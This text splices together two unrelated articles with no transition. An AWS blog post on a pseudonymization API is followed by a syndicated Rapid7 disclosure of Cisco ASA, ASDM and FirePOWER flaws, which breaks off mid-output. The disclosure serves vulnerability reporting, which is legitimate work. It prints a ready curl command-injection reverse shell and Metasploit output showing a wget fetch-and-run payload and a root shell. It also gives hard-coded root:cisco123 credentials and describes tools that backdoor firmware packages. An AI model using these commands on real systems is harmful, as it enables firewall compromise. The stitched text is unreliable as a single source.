We create the solution resources via AWS CloudFormation. The CloudFormation stack template and the source code for the Lambda function are available in GitHub Repository.

We walk you through the following steps:

Deploy the solution resources with AWS CloudFormation.
Generate encryption keys and persist them in AWS Secrets Manager.
Test the service.

Demystifying the pseudonymization service

Pseudonymization logic is written in Java and uses the AES-GCM-SIV algorithm developed by codahale. The source code is hosted in a Lambda function. Secret keys are stored securely in Secrets Manager. AWS Key Management System (AWS KMS) makes sure that secrets and sensitive components are protected at rest. The service is exposed to consumers via API Gateway as a REST API. Consumers are authenticated and authorized to consume the API via API keys. The pseudonymization service is technology agnostic and can be adopted by any form of consumer as long as they’re able to consume REST APIs.

As depicted in the following figure, the API consists of two resources with the POST method:

API Resources

Pseudonymization – The pseudonymization resource can be used by authorized users to pseudonymize a given list of plaintexts (identifiers) and replace them with a pseudonym.
Reidentification – The reidentification resource can be used by authorized users to convert pseudonyms to plaintexts (identifiers).

The request response model of the API utilizes Java string arrays to store multiple values in a single variable, as depicted in the following code.

Request/Response model

The API supports a Boolean type query parameter to decide whether encryption is deterministic or probabilistic.

The implementation of the algorithm has been modified to add the logic to generate a nonce, which is dependent on the plaintext being pseudonymized. If the incoming query parameters key deterministic has the value True, then the overloaded version of the encrypt function is called. This generates a nonce using the HmacSHA256 function on the plaintext, and takes 12 sub-bytes from a predetermined position for nonce. This nonce is then used for the encryption and prepended to the resulting ciphertext. The following is an example:

Identifier – VIN98765432101234
Nonce – NjcxMDVjMmQ5OTE5
Pseudonym – NjcxMDVjMmQ5OTE5q44vuub5QD4WH3vz1Jj26ZMcVGS+XB9kDpxp/tMinfd9

This approach is useful especially for building analytical systems that may require PII fields to be used for joining datasets with other pseudonymized datasets.

The following code shows an example of deterministic encryption.

If the incoming query parameters key deterministic has the value False, then the encrypt method is called without the deterministic parameter and the nonce generated is a random 12 bytes. This generates a different ciphertext for the same incoming plaintext.

The following code shows an example of probabilistic encryption.

Probabilistic Encryption

The Lambda function utilizes a couple of caching mechanisms to boost the performance of the function. It uses Guava to build a cache to avoid generation of the pseudonym or identifier if it’s already available in the cache. For the probabilistic approach, the cache isn’t utilized. It also uses SecretCache, an in-memory cache for secrets requested from Secrets Manager.

Prerequisites

For this walkthrough, you should have the following prerequisites:

An AWS account
An AWS Identity and Access Management (IAM) principal with privileges to deploy the stack and related resources
An Amazon Simple Storage Service (Amazon S3) bucket in the same account and same Region where the solution is deployed
Code dependencies highlighted in the README

Deploy the solution resources with AWS CloudFormation

The deployment is triggered by running the deploy.sh script. The script runs the following phases:

Checks for dependencies.
Builds the Lambda package.
Builds the CloudFormation stack.
Deploys the CloudFormation stack.
Prints to standard out the stack output.

The following resources are deployed from the stack:

An API Gateway REST API with two resources:
- /pseudonymization
- /reidentification
A Lambda function
A Secrets Manager secret
A KMS key
IAM roles and policies
An Amazon CloudWatch Logs group

You need to pass the following parameters to the script for the deployment to be successful:

STACK_NAME – The CloudFormation stack name.
AWS_REGION – The Region where the solution is deployed.
AWS_PROFILE – The named profile that applies to the AWS Command Line Interface (AWS CLI). command
ARTEFACT_S3_BUCKET – The S3 bucket where the infrastructure code is stored. The bucket must be created in the same account and Region where the solution lives.

Use the following commands to run the ./deployments_scripts/deploy.sh script:

chmod +x ./deployment_scripts/deploy.sh ./deployment_scripts/deploy.sh -s STACK_NAME -b ARTEFACT_S3_BUCKET -r AWS_REGION -p AWS_PROFILE AWS_REGION

Upon successful deployment, the script displays the stack outputs, as depicted in the following screenshot. Take note of the output, because we use it in subsequent steps.

Stack Output

Generate encryption keys and persist them in Secrets Manager

In this step, we generate the encryption keys required to pseudonymize the plain text data. We generate those keys by calling the KMS key we created in the previous step. Then we persist the keys in a secret. Encryption keys are encrypted at rest and in transit, and exist in plain text only in-memory when the function calls them.

To perform this step, we use the script key_generator.py. You need to pass the following parameters for the script to run successfully:

KmsKeyArn – The output value from the previous stack deployment
AWS_PROFILE – The named profile that applies to the AWS CLI command
AWS_REGION – The Region where the solution is deployed
SecretName – The output value from the previous stack deployment

Use the following command to run ./helper_scripts/key_generator.py:

python3 ./helper_scripts/key_generator.py -k KmsKeyArn -s SecretName -p AWS_PROFILE -r AWS_REGION

Upon successful deployment, the secret value should look like the following screenshot.

Encryption Secrets

Test the solution

In this step, we configure Postman and query the REST API, so you need to make sure Postman is installed in your machine. Upon successful authentication, the API returns the requested values.

The following parameters are required to create a complete request in Postman:

PseudonymizationUrl – The output value from stack deployment
ReidentificationUrl – The output value from stack deployment
deterministic – The value True or False for the pseudonymization call
API_Key – The API key, which you can retrieve from API Gateway console

Follow these steps to set up Postman:

Start Postman in your machine.
On the File menu, choose Import.
Import the Postman collection.
From the collection folder, navigate to the pseudonymization request.
To test the pseudonymization resource, replace all variables in the sample request with the parameters mentioned earlier.

The request template in the body already has some dummy values provided. You can use the existing one or exchange with your own.

Choose Send to run the request.

The API returns in the body of the response a JSON data type.

Reidentification

From the collection folder, navigate to the reidentification request.
To test the reidentification resource, replace all variables in the sample request with the parameters mentioned earlier.
Pass to the response template in the body the pseudonyms output from earlier.
Choose Send to run the request.

The API returns in the body of the response a JSON data type.

Pseudonyms

Cost and performance

There are many factors that can determine the cost and performance of the service. Performance especially can be influenced by payload size, concurrency, cache hit, and managed service limits on the account level. The cost is mainly influenced by how much the service is being used. For our cost and performance exercise, we consider the following scenario:

The REST API is used to pseudonymize Vehicle Identification Numbers (VINs). On average, consumers request pseudonymization of 1,000 VINs per call. The service processes on average 40 requests per second, or 40,000 encryption or decryption operations per second. The average process time per request is as follows:

15 milliseconds for deterministic encryption
23 milliseconds for probabilistic encryption
6 milliseconds for decryption

The number of calls hitting the service per month is distributed as follows:

50 million calls hitting the pseudonymization resource for deterministic encryption
25 million calls hitting the pseudonymization resource for probabilistic encryption
25 million calls hitting the reidentification resource for decryption

Based on this scenario, the average cost is $415.42 USD per month. You may find the detailed cost breakdown in the estimate generated via the AWS Pricing Calculator.

We use Locust to simulate a similar load to our scenario. Measurements from Amazon CloudWatch metrics are depicted in the following screenshots (network latency isn’t considered during our measurement).

The following screenshot shows API Gateway latency and Lambda duration for deterministic encryption. Latency is high at the beginning due to the cold start, and flattens out over time.

API Gateway Latency & Lamdba Duration for deterministic encryption. Latency is high at the beginning due to the cold start and flattens out over time.

The following screenshot shows metrics for probabilistic encryption.

metrics for probabilistic encryption

The following shows metrics for decryption.

metrics for decryption

Clean up

To avoid incurring future charges, delete the CloudFormation stack by running the destroy.sh script. The following parameters are required to run the script successfully:

STACK_NAME – The CloudFormation stack name
AWS_REGION – The Region where the solution is deployed
AWS_PROFILE – The named profile that applies to the AWS CLI command

Use the following commands to run the ./deployment_scripts/destroy.sh script:

chmod +x ./deployment_scripts/destroy.sh ./deployment_scripts/destroy.sh -s STACK_NAME -r AWS_REGION -p AWS_PROFILE

Conclusion

In this post, we demonstrated how to build a pseudonymization service on AWS. The solution is technology agnostic and can be adopted by any form of consumer as long as they’re able to consume REST APIs. We hope this post helps you in your data protection strategies.

Stay tuned for part 2, which will cover consumption patterns of the pseudonymization service.

About the authors

Edvin Hallvaxhiu is a Senior Global Security Architect with AWS Professional Services and is passionate about cybersecurity and automation. He helps customers build secure and compliant solutions in the cloud. Outside work, he likes traveling and sports.

Rahul Shaurya is a Senior Big Data Architect with AWS Professional Services. He helps and works closely with customers building data platforms and analytical applications on AWS. Outside of work, Rahul loves taking long walks with his dog Barney.

Andrea Montanari is a Big Data Architect with AWS Professional Services. He actively supports customers and partners in building analytics solutions at scale on AWS.

María Guerra is a Big Data Architect with AWS Professional Services. Maria has a background in data analytics and mechanical engineering. She helps customers architecting and developing data related workloads in the cloud.

Pushpraj is a Data Architect with AWS Professional Services. He is passionate about Data and DevOps engineering. He helps customers build data driven applications at scale.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

2022-08-11 Jake Baines

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

Rapid7 discovered vulnerabilities and “non-security” issues affecting Cisco Adaptive Security Software (ASA), Adaptive Security Device Manager (ASDM), and FirePOWER Services Software for ASA. Rapid7 initially reported the issues to Cisco in separate disclosures in February and March 2022. Rapid7 and Cisco continued discussing impact and resolution of the issues through August 2022. The following table lists the vulnerabilities and the last current status that we were able to verify ourselves. Note: Cisco notified Rapid7 as this blog was going to press that they had released updated software. We have been unable to verify these fixes, but have marked them with ** in the table.

For information on vulnerability checks in InsightVM and Nexpose, please see the Rapid7 customers section at the end of this blog.

Description	Identifier	Status
Cisco ASDM binary packages are not signed. A malicious ASDM package can be installed on a Cisco ASA resulting in arbitrary code execution on any client system that connects to the ASA via ASDM.	CVE-2022-20829	Not fixed**
The Cisco ASDM client does not verify the server’s SSL certificate, which makes it vulnerable to man-in-the-middle (MITM) attacks.	None	Not fixed
Cisco ASDM client sometimes logs credentials to a local log file. Cisco indicated this was a duplicate issue, although they updated CVE-2022-20651’s affected versions to include the version Rapid7 reported and issued a new release of ASDM (7.17.1.155) in June.	CVE-2022-20651	Fixed
Cisco ASDM client is affected by an unauthenticated remote code execution vulnerability. The issue was originally reported by Malcolm Lashley and was disclosed without a fix by Cisco in July 2021. Cisco reported this issue was fixed in ASDM 7.18.1.150, but Rapid7 has informed Cisco that the issue was in fact not addressed and remains unfixed. Cisco sent a new build for testing prior to publication of this blog, but because of time constraints we were unable to test it.	CVE-2021-1585 CSCvw79912	Not fixed**
Cisco ASDM binary package contains an unsigned Windows installer. The ASDM client will prompt the user to execute the unsigned installer or users are expected to download the installer from the ASA and execute it. This is an interesting code execution mechanism to be used with CVE-2022-20829 or CVE-2021-1585.	CSCwc21296	Fixed
Cisco ASA-X with FirePOWER Services is vulnerable to an authenticated, remote command injection vulnerability. Using this vulnerability allows an attacker to gain root access to the FirePOWER module.	CVE-2022-20828	Fixed in most maintained versions
Cisco FirePOWER module before 6.6.0 allowed a privileged Cisco ASA user to reset the FirePOWER module user’s password. A privileged Cisco ASA user could bypass the FirePOWER module login prompt to gain root access on the FirePOWER module.	CSCvo79327	Fixed in most maintained versions
Cisco FirePOWER module boot images before 7.0.0 allow a privileged Cisco ASA user to obtain a root shell via command injection or hard-coded credentials.	CSCvu90861	Fixed in boot images >= 7.0. Not fixed on ASA.
Cisco ASA with FirePOWER Services loads and executes arbitrary FirePOWER module boot images. The ASA does not restrict the use of old boot images or even the use of boot images that weren’t created by Cisco. This could result in code execution from a malicious boot image.	None	Not fixed
Some Cisco FirePOWER module boot images support the installation of unsigned FirePOWER installation packages. This could result in code execution from a malicious package.	None	Not fixed

** Denotes an advisory Cisco updated as this blog went to press.

Rapid7 will present the vulnerabilities, exploits, and tools at Black Hat USA and DEF CON on August 11 and August 13, respectively.

Product description

Cisco ASA Software is a “core operating system for the Cisco ASA Family.” Cisco ASA are widely deployed enterprise-class firewalls that also support VPN, IPS, and many other features.

Cisco ASDM is a graphical user interface for remote administration of appliances using Cisco ASA Software.

FirePOWER Services Software is a suite of software that supports the installation of the FirePOWER module on Cisco ASA 5500-X with FirePOWER Services.

Credit

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Analysis

Of all the reported issues, Rapid7 believes the following to be the most critical.

CVE-2022-20829: ASDM binary package is not signed

The Cisco ASDM binary package is installed on the Cisco ASA. Administrators that use ASDM to manage their ASA download and install the Cisco ASDM Launcher on their Windows or macOS system. When the ASDM launcher connects to the ASA, it will download a large number of Java files from the ASA, load them into memory, and then pass execution to the downloaded Java.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

The ASDM launcher installer, the Java class files, the ASDM web portal, and other files are all contained within the ASDM binary package distributed by Cisco. Rapid7 analyzed the format of the binary package and determined that it lacked any type of cryptographic signature to verify the package’s authenticity (see CWE-347). We discovered that we could modify the contents of an ASDM package, update a hash in the package’s header, and successfully install the package on a Cisco ASA.

The result is that an attacker can craft an ASDM package that contains malicious installers, malicious web pages, and/or malicious Java. An example of exploitation using a malicious ASDM package goes like this: An administrator using the ASDM client connects to the ASA and downloads/executes attacker-provided Java. The attacker then has access to the administrator’s system (e.g. the attacker can send themselves a reverse shell). A similar attack was executed by Slingshot APT against Mikrotik routers and the administrative tool Winbox.

The value of this vulnerability is high because the ASDM package is a distributable package. A malicious ASDM package might be installed on an ASA in a supply chain attack, installed by an insider, installed by a third-party vendor/administrator, or simply made available “for free” on the internet for administrators to discover themselves (downloading ASDM from Cisco requires a valid contract).

Rapid7 has published a tool, the way, that demonstrates extracting and rebuilding “valid” ASDM packages. The way can also generate ASDM packages with an embedded reverse shell. The following video demonstrates an administrative user triggering the reverse shell simply by connecting to the ASA.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

Note: Cisco communicated on August 11, 2022 that they had released new software images that resolve CVE-2022-20829. We have not yet verified this information.

CVE-2021-1585: Failed patch

Rapid7 vulnerability research previously described exploitation of CVE-2021-1585 on AttackerKB. The vulnerability allows a man-in-the-middle or evil endpoint to execute arbitrary Java code on an ASDM administrator’s system via the ASDM launcher (similar to CVE-2022-20829). Cisco publicly disclosed this vulnerability without a patch in July 2021. However, at the time of writing, Cisco’s customer-only disclosure page for CVE-2021-1585 indicates that the vulnerability was fixed with the release of ASDM 7.18.1.150 in June 2022.

Rapid7 quickly demonstrated to Cisco that this is incorrect. Using our public exploit for CVE-2021-1585, staystaystay, Rapid7 was able to demonstrate the exploit works against ASDM 7.18.1.150 without any code changes.

The following video demonstrates downloading and installing 7.18.1.150 from an ASA and then using staystaystay to exploit the new ASDM launcher. staystaystay only received two modifications:

The version.prop file on the web server was updated to indicate the ASDM version is 8.14(1) to trigger the new loading behavior.
The file /public/jploader.jar was downloaded from the ASA and added to the staystaystay web server.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

Additionally, ASDM 7.18.1.150 is still exploitable when it encounters older versions of ASDM on the ASA. The following shows that Cisco added a pop-up to the ASDM client indicating connecting to the remote ASA may be dangerous, but allows the exploitation to continue if the user clicks “Yes”:

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

CVE-2021-1585 is a serious vulnerability. Man-in-the-middle attacks are trivial for well-funded APT. Often they have the network position and the motive. It also does not help that ASDM does not validate the remote server’s SSL certificate and uses HTTP Basic Authentication by default (leading to password disclosure to active MITM). The fact that this vulnerability has been public and unpatched for over a year should be a concern to anyone who administers Cisco ASA using ASDM.

If Cisco did release a patch in a timely manner, it’s unclear how widely the patch would be adopted. Rapid7 scanned the internet for ASDM web portals on June 15, 2022, and examined the versions of ASDM being used in the wild. ASDM 7.18.1 had been released a week prior and less than 0.5% of internet-facing ASDM had adopted 7.18.1. Rapid7 found the most popular version of ASDM to be 7.8.2, a version that had been released in 2017.

Note: Cisco communicated on August 11, 2022 that they had released new software images that resolve CVE-2021-1585. We have not yet verified this information.

ASDM Version	Count
Cisco ASDM 7.8(2)	3202
Cisco ASDM 7.13(1)	1698
Cisco ASDM 7.15(1)	1597
Cisco ASDM 7.16(1)	1139
Cisco ASDM 7.9(2)	1070
Cisco ASDM 7.14(1)	1009
Cisco ASDM 7.8(1)	891
Cisco ASDM 7.17(1)	868
Cisco ASDM 7.12(2)	756
Cisco ASDM 7.12(1)	745

CVE-2022-20828: Remote and authenticated command injection

CVE-2022-20828 is a remote and authenticated vulnerability that allows an attacker to achieve root access on ASA-X with FirePOWER Services when the FirePOWER module is installed. To better understand what the FirePOWER module is, we reference an image from Cisco’s Cisco ASA FirePOWER Module Quick Start Guide.

The FirePOWER module is the white oval labeled “ASA FirePOWER Module Deep Packet Inspection.” The module is a Linux-based virtual machine (VM) hosted on the ASA. The VM runs Snort to classify traffic passing through the ASA. The FirePOWER module is fully networked and can access both outside and inside of the ASA, making it a fairly ideal location for an attacker to hide in or stage attacks from.

The command injection vulnerability is linked to the Cisco command line interface (CLI) session do command. In the example that follows, command session do \id`is being executed on the Cisco ASA CLI via ASDM (HTTP), and the Linux commandid` is executed within the FirePOWER module.

A reverse shell exploit for this vulnerability is small enough to be tweetable (our favorite kind of exploit). The following curl command can fit in a tweet and will generate a bash reverse shell from the FirePOWER module to 10.12.70.252:1270:

curl -k -u albinolobster:labpass1 -H "User-Agent: ASDM/ Java/1.8" "https://10.12.70.253/admin/exec/session+sfr+do+\`bash%20-i%20>&%20%2fdev%2ftcp%2f10.12.70.252%2f1270%200>&1\`"

A Metasploit module has been developed to exploit this issue as well.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

The final takeaway for this issue should be that exposing ASDM to the internet could be very dangerous for ASA that use the FirePOWER module. While this might be a credentialed attack, as noted previously, ASDM’s default authentication scheme discloses username and passwords to active MITM attackers. ASDM client has also recently logged credentials to file (CVE-2022-20651), is documented to support the credentials <blank>:<blank> by default (See “Start ASDM”, Step 2), and, by default, doesn’t have brute-force protections enabled. All of that makes the following a very real possibility.

To further demonstrate ASDM password weaknesses, we’ve published Metasploit modules for brute-forcing credentials on the ASDM interface and searching through ASDM log files for valid credentials.

CSCvu90861: FirePOWER boot image root shell

In the previous section, we learned about the Cisco FirePOWER module. In this section, it’s important to know how the FirePOWER module is installed. Installation is a three-step process:

Upload and start the FirePOWER boot image.
From the boot image, download and install the FirePOWER installation package.
From the FirePOWER module VM, install the latest updates.

CSCvu90861 concerns itself with a couple of issues associated with the boot image found in step 1. The boot image, once installed and running, can be entered using the Cisco ASA command session sfr console:

As you can see, the user is presented with a very limited CLI that largely only facilitates network troubleshooting and installing the FirePOWER installation package. Credentials are required to access this CLI. These credentials are well-documented across the various versions of the FirePOWER boot image (see “Set Up the ASA SFR Boot Image, Step 1”). However, what isn’t documented is that the credentials root:cisco123 will drop you down into a root bash shell.

The FirePOWER boot image, similar to the normal FirePOWER module, is networked. It can be configured to use DHCP or a static address, but either way, it has access to inside and outside of the ASA (assuming typical wiring). Again, a perfect staging area for an attacker and a pretty good place to hide.

We also discovered a command injection vulnerability associated with the system install command that yields the same result (root access on the boot image).

We wrote two SSH-based exploits that demonstrate exploitation of the boot image. The first is a stand-alone Python script, and the second is a Metasploit module. Exploitation takes about five minutes, so Metasploit output will have to suffice on this one:

albinolobster@ubuntu:~/metasploit-framework$ ./msfconsole 
                                                  
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.2.5-dev-ed2c64bffd                ]
+ -- --=[ 2228 exploits - 1172 auxiliary - 398 post       ]
+ -- --=[ 863 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can pivot connections over sessions 
started with the ssh_login modules

[*] Starting persistent handler(s)...
msf6 > use exploit/linux/ssh/cisco_asax_firepower_boot_root
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > show options

Module options (exploit/linux/ssh/cisco_asax_firepower_boot_root):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   ENABLE_PASSWORD                   yes       The enable password
   IMAGE_PATH                        yes       The path to the image on the ASA (e.g. disk0:/asasfr-5500x-boot-6.2.3-4.img
   PASSWORD         cisco123         yes       The password for authentication
   RHOSTS                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT            22               yes       The target port (TCP)
   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)
   USERNAME         cisco            yes       The username for authentication


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set IMAGE_PATH disk0:/asasfr-5500x-boot-6.2.3-4.img
IMAGE_PATH => disk0:/asasfr-5500x-boot-6.2.3-4.img
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set USERNAME albinolobster
USERNAME => albinolobster
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set LHOST 10.12.70.252
LHOST => 10.12.70.252
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set RHOST 10.12.70.253
RHOST => 10.12.70.253
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > run

[*] Started reverse TCP handler on 10.12.70.252:4444 
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Using URL: http://10.12.70.252:8080/ieXiNV
[*] 10.12.70.253:22 - Attempting to login...
[+] Authenticated with the remote server
[*] Resetting SFR. Sleep for 120 seconds
[*] Booting the image... this will take a few minutes
[*] Configuring DHCP for the image
[*] Dropping to the root shell
[*] wget -qO /tmp/scOKRuCR http://10.12.70.252:8080/ieXiNV;chmod +x /tmp/scOKRuCR;/tmp/scOKRuCR;rm -f /tmp/scOKRuCR
[*] Client 10.12.70.253 (Wget) requested /ieXiNV
[*] Sending payload to 10.12.70.253 (Wget)
[*] Sending stage (989032 bytes) to 10.12.70.253
[*] Meterpreter session 1 opened (10.12.70.252:4444 -> 10.12.70.253:53445) at 2022-07-05 07:37:22 -0700
[+] Done!
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.

meterpreter > shell
Process 2160 created.
Channel 1 created.
uname -a
Linux asasfr 3.10.107sf.cisco-1 #1 SMP PREEMPT Fri Nov 10 17:06:45 UTC 2017 x86_64 GNU/Linux
id
uid=0(root) gid=0(root)

This attack can be executed even if the FirePOWER module is installed. The attacker can simply uninstall the FirePOWER module and start the FirePOWER boot image (although that is potentially quite obvious depending on FirePOWER usage). However, this attack seems more viable as ASA-X ages and Cisco stops releasing new rules/updates for the FirePOWER module. Organizations will likely continue using ASA-X with FirePOWER Services without FirePOWER enabled/installed simply because they are “good” Cisco routers.

Malicious FirePOWER boot image

The interesting thing about vulnerabilities (or non-security issues depending on who you are talking to) affecting the FirePOWER boot image is that the Cisco ASA has no mechanism that prevents users from loading and executing arbitrary images. Cisco removed the hard-coded credentials and command injection in FirePOWER boot images >= 7.0.0, but an attacker can still load and execute an old FirePOWER boot image that still has the vulnerabilities.

In fact, there is nothing preventing a user from booting an image of their own creation. FirePOWER boot images are just bootable Linux ISO. We wrote a tool that will generate a bootable TinyCore ISO that can be executed on the ASA. The ISO, when booted, will spawn a reverse shell out to the attacker and start an SSH server, and it comes with DOOM-ASCII installed (in case you want to play DOOM on an ASA). The generated ISO is installed on the ASA just as any FirePOWER boot image would be:

albinolobster@ubuntu:~/pinchme$ ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 [email protected]
[email protected]'s password: 
User albinolobster logged in to ciscoasa
Logins over the last 5 days: 42.  Last login: 23:41:56 UTC Jun 10 2022 from 10.0.0.28
Failed logins since the last login: 0.  Last failed login: 23:41:54 UTC Jun 10 2022 from 10.0.0.28
Type help or '?' for a list of available commands.
ciscoasa> en
Password: 
ciscoasa# copy http://10.0.0.28/tinycore-custom.iso disk0:/tinycore-custom.iso

Address or name of remote host [10.0.0.28]? 

Source filename [tinycore-custom.iso]? 

Destination filename [tinycore-custom.iso]? 

Accessing http://10.0.0.28/tinycore-custom.iso...!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Writing file disk0:/tinycore-custom.iso...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
INFO: No digital signature found
76193792 bytes copied in 18.440 secs (4232988 bytes/sec)

ciscoasa# sw-module module sfr recover configure image disk0:/tinycore-custom.iso
ciscoasa# debug module-boot
debug module-boot  enabled at level 1
ciscoasa# sw-module module sfr recover boot

Module sfr will be recovered. This may erase all configuration and all data
on that device and attempt to download/install a new image for it. This may take
several minutes.

Recover module sfr? [confirm]
Recover issued for module sfr.
ciscoasa# Mod-sfr 177> ***
Mod-sfr 178> *** EVENT: Creating the Disk Image...
Mod-sfr 179> *** TIME: 15:12:04 UTC Jun 13 2022
Mod-sfr 180> ***
Mod-sfr 181> ***
Mod-sfr 182> *** EVENT: The module is being recovered.
Mod-sfr 183> *** TIME: 15:12:04 UTC Jun 13 2022
Mod-sfr 184> ***
Mod-sfr 185> ***
Mod-sfr 186> *** EVENT: Disk Image created successfully.
Mod-sfr 187> *** TIME: 15:13:42 UTC Jun 13 2022
Mod-sfr 188> ***
Mod-sfr 189> ***
Mod-sfr 190> *** EVENT: Start Parameters: Image: /mnt/disk0/vm/vm_1.img, ISO: -cdrom /mnt/disk0
Mod-sfr 191> /tinycore-custom.iso, Num CPUs: 3, RAM: 2249MB, Mgmt MAC: 00:FC:BA:44:54:31, CP MA
Mod-sfr 192> C: 00:00:00:02:00:01, HDD: -drive file=/dev/sda,cache=none,if=virtio, Dev Driver: 
Mod-sfr 193> vir
Mod-sfr 194> ***
Mod-sfr 195> *** EVENT: Start Parameters Continued: RegEx Shared Mem: 0MB, Cmd Op: r, Shared Me
Mod-sfr 196> m Key: 8061, Shared Mem Size: 16, Log Pipe: /dev/ttyS0_vm1, Sock: /dev/ttyS1_vm1, 
Mod-sfr 197> Mem-Path: -mem-path /hugepages
Mod-sfr 198> *** TIME: 15:13:42 UTC Jun 13 2022
Mod-sfr 199> ***
Mod-sfr 200> Status: Mapping host 0x2aab37e00000 to VM with size 16777216
Mod-sfr 201> Warning: vlan 0 is not connected to host network

Once the ISO is booted, a reverse shell is sent back to the attacker.

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.21 60579
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux box 3.16.6-tinycore #777 SMP Thu Oct 16 09:42:42 UTC 2014 i686 GNU/Linux
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:00:00:02:00:01  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:173 errors:0 dropped:164 overruns:0 frame:0
          TX packets:14 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:9378 (9.1 KiB)  TX bytes:4788 (4.6 KiB)

eth1      Link encap:Ethernet  HWaddr 00:FC:BA:44:54:31  
          inet addr:192.168.1.17  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:1482 (1.4 KiB)  TX bytes:1269 (1.2 KiB)

eth2      Link encap:Ethernet  HWaddr 52:54:00:12:34:56  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:14 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:4788 (4.6 KiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Once again, this presents a potential social engineering issue. An attacker that is able to craft their own malicious boot image needs only to convince an administrator to install it. However, an attacker cannot pre-install the image and provide the ASA to a victim because boot images are removed every time the ASA is rebooted.

Malicious FirePOWER installation package

As mentioned previously, step two of the FirePOWER installation process is to install the FirePOWER installation package. Some FirePOWER modules support two versions of the FirePOWER installation package:

The above code is taken from the FirePOWER boot image 6.2.3. We can see it supports two formats:

EncryptedContentSignedChksumPkgWrapper
ChecksumPkgWrapper

Without getting into the weeds on the details, EncryptedContentSignedChksumPkgWrapper is an overly secure format, and Cisco only appears to publish FirePOWER installation packages in that format. However, the boot images also support the insecure ChcksumPkgWrapper format. So, we wrote a tool that takes in a secure FirePOWER installation package, unpackages it, inserts a backdoor, and then repackages into the insecure package format.

albinolobster@ubuntu:~/whatsup/build$ ./whatsup -i ~/Desktop/asasfr-sys-5.4.1-211.pkg --lhost 10.0.0.28 --lport 1270
   __      __  __               __    __
  /\ \  __/\ \/\ \             /\ \__/\ \
  \ \ \/\ \ \ \ \ \___      __ \ \ ,_\ \/ ____
   \ \ \ \ \ \ \ \  _ `\  /'__`\\ \ \/\/ /',__\
    \ \ \_/ \_\ \ \ \ \ \/\ \L\.\\ \ \_ /\__, `\
     \ `\___x___/\ \_\ \_\ \__/.\_\ \__\\/\____/
      '\/__//__/  \/_/\/_/\/__/\/_/\/__/ \/___/
   __  __
  /\ \/\ \
  \ \ \ \ \  _____            jbaines-r7
   \ \ \ \ \/\ '__`\              🦞
    \ \ \_\ \ \ \L\ \      "What's going on?"
     \ \_____\ \ ,__/
